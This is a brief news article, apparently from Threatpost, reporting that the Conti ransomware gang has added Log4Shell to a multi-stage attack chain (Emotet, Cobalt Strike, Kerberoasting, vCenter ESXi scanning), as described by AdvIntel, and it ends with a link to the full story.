Conti Ransomware Gang Has Full Log4Shell Attack Chain

Conti has become the first professional-grade, sophisticated ransomware group to weaponize Log4j2, now with a full attack chain.

The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.

The sophisticated Russia-based Conti group – which Palo Alto Networks has called “one of the most ruthless” of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday.

As of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel’s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> brute -> vCenter ESXi with log4shell scan for vCenter.

Attack Chain

Stepping through that attack chain:

Emotet is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install … Cobalt Strike, the legitimate, commercially available tool used by network penetration testers on infected devices

Read More: https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/